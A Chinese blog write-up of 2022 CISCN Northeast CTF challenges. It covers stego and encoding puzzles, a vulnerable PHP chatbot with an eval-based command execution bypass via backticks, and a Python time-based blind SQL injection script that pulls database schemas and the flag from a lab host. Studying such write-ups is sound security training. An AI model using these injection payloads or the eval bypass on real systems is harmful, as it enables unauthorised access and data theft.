当前位置:网站首页>2022 ciscn China northeast repetition
2022 ciscn China northeast repetition
2022-08-05 18:21:00 【XINO,】
pikachu
stegsolve查看发现lsb隐写,Red, blue and green channels have encrypted strings,这里用setegA shuttle should also work
cGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYSBwaXBpIHBpIHBpcGkgcGkgcGkgcGkgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaXBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpY2h1IHBpY2h1IHBpY2h1IHBpY2h1IGthIGNodSBwaXBpIHBpcGkgcGlwaSBwaXBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIHBpa2FjaHUga2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaWthY2h1IHBpIHBpIHBpa2FjaHUgcGlwaSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIHBpa2FjaHUgcGlwaSBwaSBwaSBwaWthY2h1IHBpY2h1IHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaSBwaWthY2h1IHBpY2h1IGthIHBpa2FjaHUgcGkgcGkgcGkgcGlrYWNodSBrYSBwaWthY2h1IHBpcGkgcGkgcGlrYWNodSBwaWthY2h1IHBpY2h1IHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpIHBpa2FjaHUgcGljaHUgcGlrYWNodSBwaXBpIGthIGthIGthIGthIGthIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBwaWNodSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpa2FjaHUga2EgcGlrYWNodSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaWthY2h1IA==
感觉像base64,解码
pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu
pi ka chu解码
https://www.dcode.fr/pikalang-language
snowberg
010看下crc错报,Look at the encrypted stringaes
U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==
But it can't be unlocked without the key
之后zsteg发现lsb隐写,有个压缩包,save bin
4个文件,需要密码
We can do it if we have done similar questionsCRC32爆破
脚本地址
https://github.com/theonlypwner/crc32
Blast one by onekey
y0u_f0und_th1s_k3y
解码就行
old
base-rot13-W型栅栏3栏
Just a shuttle
welcomeToCiscn
F12源码查看flag,在/flag目录里面就是flag
会聊天的ctf机器人
imageRead any fileapi.php源码
```php<?phpinit();function init(){ $sesspath = "/tmp/session"; session_save_path($sesspath); session_start(); if (!$_SESSION['cname']) $_SESSION['cname'] = 'ck'; if(!file_dir_exists("/tmp/resource")) mkdir("/tmp/resource");}
function file_dir_exists($path){ $dir = dir($path); if ($dir) if ($dir->read()) return true; return is_file($path);}
function getres($input){ log_write($input); chdir("/tmp/resource/"); $path = $_SESSION['cname']; if(!file_dir_exists($path)){ return "è¯·å…ˆä¸Šä¼ è¯åº“文件。"; } $ck = json_decode(file_get_contents($path),true); foreach ($ck as $key => $value){ if (strstr($key,$input) or strstr($input,$key)){ $type = key($value); $v = $value[$type]; switch ($type){ case "string": return $v; case "image": $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>'; return $b64img; case "calc": if ($_SESSION['is_admin']){ if (preg_match("/\(|\)|\'|\"/im",$v)){ return "包å«éžæ³•å—符"; } return eval("return $v;"); }else{ return "adminæ‰èƒ½ä½¿ç”¨è¿ä¸ªåŠŸèƒ½"; } default: return "è¿ä¸ªåŠ¨ä½œæš‚æ—¶è¿˜æ²¡èƒ½åžçް"; }
} } return "没有匹é…到è¯åº“消æ¯";}
function uploadc(){ $data = $_POST['uploadc']; $filename = $_POST['cname']; $resourcedir = "/tmp/resource/"; if(!file_dir_exists($resourcedir)) mkdir($resourcedir); if(strpos($data,"<")){ die("åˆ«è¿æ ·ï¼"); } if(strpos($filename,".")){ die("åˆ«è¿æ ·ï¼"); } $_SESSION['cname'] = $filename; if(file_put_contents($resourcedir.$filename,$data)) { return "ä¸Šä¼ æˆåŠŸ"; }else{ return "ä¸Šä¼ å¤±è´¥"; }}function log_write($msg){ $logpath = "log.txt"; $oper = session_id(); $opername = substr($oper,0,1) ; for ($i=0;$i <= strlen($oper);$i++) $opername .= "*"; file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);}
if(isset($_POST['input'])) echo getres($_POST['input']);if(isset($_POST['uploadc'])) echo uploadc();if(isset($_POST['clear'])) file_put_contents("log.txt","");if(isset($_GET['log']))echo file_get_contents("log.txt");
通过upload写session文件,获取admin权限
Code execution filters out parentheses and quotes to bypass backticks directly
执行命令就可以了
ezsql
False positive injection,没有任何过滤,Note that the current database of the field is different from the database of this site,Backticks are required to clarify fields,Otherwise it doesn't work
import requests
url='http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag=''
for i in range(1,55):
m=32
n=127
while 1:
mid=(m+n)//2
#payload="1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i,mid)#ctfshow_flagxc,ctfshow_info
#mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s
#payload="1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i,mid)
#account_status,account_type,accounts,customers,customers_sNpe,users
#payload="1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i,mid)
# [email protected]
payload="1'or if(ascii(substr((select `[email protected]` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i,mid)
print(url+payload)
try:
r=requests.get(url=url+payload,timeout=2)
m=mid
except:
n=mid
if(m+1==n):
flag+=chr(m)
print(flag)
break
边栏推荐
- 申万宏源证券新手开户,安全吗?
- eKuiper Newsletter 2022-07|v1.6.0:Flow 编排 + 更好用的 SQL,轻松表达业务逻辑
- 金仓数据库 KingbaseES V8 GIS 数据迁移方案(5. 第三方通用格式 GIS 数据迁移到 KES)
- 使用腾讯云对象存储 COS + PicGo 搭建图床服务
- Matlab求解线性方程式与线性问题
- 包载信使mRNA的多西环素纳米脂质体|雷公藤红素纳米脂质体RNA核糖核酸(实验原理)
- FPGA解析B码----连载5
- 2022年全国最新消防设施操作员(中级消防设施操作员)真题题库及答案
- 金鱼哥RHCA回忆录:CL210管理计算资源--课外普及之Heat组件详解
- var let const
猜你喜欢

PNAS:alpha频率经颅电刺激调控大脑默认网络

历史上的今天:第一位图灵奖女性得主;NVIDIA 收购 MediaQ;首届网络安全挑战大赛完成...

倪光南:openEuler已达国际同类社区水准

MongoDB数据库增删改查基本使用

npm WARN config global `--global`, `--local` are deprecated. Use `--location=global` instead.

氧化钆包裹四氧化三铁Fe3O4磁性荧光纳米空心球|聚乙二醇二羧酸包覆四氧化三铁磁纳米颗粒(COOH-PEG-Fe3O4)

核糖核酸RNA的药物修饰方法

氨基修饰四氧化三铁纳米粒子Fe3O4-NH2|四氧化三铁纳米粒子表面修饰聚酰胺胺型树枝高分子(PAMAM)

脑间同步:道阻且长

基于ABP和Magicodes实现Excel导出操作
随机推荐
MetaFormer/PoolFormer学习笔记及代码
三七总皂苷脂质体纳米粒子修饰负载RNA核糖核酸(实验注意事项)
对话窗口、面板滚动视图、标签切换视图;QDialog、QScroollArea、
小就是大|2022 OceanBase 年度发布会亮点抢先看!
Orchestrator 对 MGR MySQL Group Replication的支持
齐岳|超顺磁性单层氧化石墨烯/四氧化三铁纳米粒子复合杂化材料载药
第十八天笔记
rk3399 如何使用dynamic debug动态打印调试
核糖核酸RNA的药物修饰方法
智能合约安全——随机数
优化客户服务的 7 个关键步骤
EfficientFormer学习笔记
PNAS:alpha频率经颅电刺激调控大脑默认网络
耗时 48 小时,小米工程师发明小米头箍,网友:变身孙悟空不是梦!
记一次Max模型导入到GIS平台歪了,尺寸不对过程分析
再做螺旋矩阵AcWing753 756【写法妙】
Kubernetes的整体架构
2022CISCN华东北复现
nacos和eruka的区别
七夕限定 | 龙凤呈祥2款包袱瓶数字藏品全网独家发售